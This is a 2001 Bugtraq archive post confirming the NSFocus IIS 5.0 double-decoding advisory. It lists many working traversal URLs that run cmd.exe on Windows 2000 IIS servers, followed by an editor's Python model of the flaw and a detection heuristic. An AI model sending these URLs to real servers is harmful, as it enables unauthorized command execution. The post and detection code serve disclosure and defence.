Bugtraq mailing list archives

Nsfocus advisory testing
From: Aldo Albuquerque - Segurança de Sistemas <aldo () cesar org br>
Date: Wed, 16 May 2001 00:18:05 -0300

Hi,

We tested various settings in our lab, with
different encoding combinations, executable directories,
and Win32 configurations.

Curiously, not all combinations worked quite the same
way on Windows 2000 Server and Professional (even discounting
the fact that certain directories exist in one and not in the
other, like PBServer or Rpc).

- Windows 2000 Professional + SP1 + IIS5.0 - Default installation
* The following combinations of directories/encodings work:

http://www.target.com/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\


- Windows 2000 Server + SP1 + IIS5.0 - Default installation
* The following combinations of directories/encodings work:


http://www.target.com/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\

It would be interesting if tests were also made by others on NT 4.0 SP6a,
since we did not test combinations with other commonly-installed
directories, such as cgi-bin, adsamples, _vti_cnf, iisadmpwd, etc.

Regards,

Aldo Albuquerque - CCSA
Tempest Security Technologies - http://www.tempest.com.br
CESAR - Centro de Estudos e Sistemas Avançados do Recife -
http://www.cesar.org.br
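All of the variants listed in the post exercise one mechanism, the double URL-decoding in IIS 5.0 described in the NSFocus advisory: each of the four encodings (%255c, %%35c, %%35%63, %25%35%63) becomes %5c after a first decode and a backslash after a second, so a traversal check that runs between the two passes sees an opaque component like "..%5c.." rather than "..". The Python below is an editor's example added to this archive page; it is not code from the post, from NSFocus, or from IIS. It models that two-pass decode with a simple check between the passes and adds a log-side heuristic that flags a request path which is still percent-encoded after one decode. The sample request paths are constructed from the post's URLs (path part only, query string dropped); the check, the depth counter and the decoder are assumptions about the behaviour, not IIS internals.

```python
"""Model of the IIS 5.0 double URL-decoding flaw exercised by the post's
test URLs (editor's example; an assumed model, not IIS source)."""
import re
from urllib.parse import unquote

# Constructed from the post's URLs: path part only, query string dropped.
SAMPLES = [
    "/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe",
    "/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe",
    "/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe",
    "/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe",
]
# Constructed contrasts: a singly-encoded traversal, which the check
# between the passes does catch, and an ordinary request.
SINGLE_ENCODED = "/msadc/..%5c..%5c..%5cwinnt/system32/cmd.exe"
BENIGN = "/scripts/report%2Etxt"

SEP = re.compile(r"[\\/]")           # treat '/' and '\' alike, as Windows does
PCT = re.compile(r"%[0-9A-Fa-f]{2}")  # one valid percent-escape


def components(path):
    """Split on '/' and '\\', dropping empty parts."""
    return [p for p in SEP.split(path) if p]


def has_dotdot(path):
    """The kind of check assumed to run between the two decodes: is any
    component literally '..'?  After one decode, '..%5c..' is a single
    opaque component and passes."""
    return ".." in components(path)


def escapes_root(path):
    """Walk the components with a depth counter; True as soon as a '..'
    would climb above the directory the virtual path is mapped to."""
    depth = 0
    for part in components(path):
        if part == "..":
            depth -= 1
            if depth < 0:
                return True
        elif part != ".":
            depth += 1
    return False


def simulate_double_decode(request_path):
    """Decode once, run the traversal check on that result, decode again,
    and report whether the twice-decoded path leaves the mapped directory."""
    once = unquote(request_path)
    twice = unquote(once)
    return {
        "once": once,
        "check_passed": not has_dotdot(once),
        "twice": twice,
        "escapes": escapes_root(twice),
    }


def looks_double_encoded(request_path):
    """Log/WAF heuristic: a path that still contains a valid %XX escape
    after one decode was percent-encoded at least twice."""
    return PCT.search(unquote(request_path)) is not None


if __name__ == "__main__":
    for req in SAMPLES + [SINGLE_ENCODED, BENIGN]:
        r = simulate_double_decode(req)
        print(f"{req}\n  once:  {r['once']}\n  twice: {r['twice']}")
        print(f"  check passed: {r['check_passed']}  escapes root: "
              f"{r['escapes']}  double-encoded: {looks_double_encoded(req)}")
```

Two things the run makes visible. The "%%35c" and "%%35%63" forms are not valid percent-encoding at all; they only work because the decoder keeps a stray "%" and continues, so a strict decoder that rejects malformed escapes outright never reaches a second pass. And the log heuristic will also flag a legitimate request whose name contains a literal "%25" (a file called "100%25.txt", for instance), so treat it as a triage signal to be reviewed together with the decoded path, not as a blocking rule on its own.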
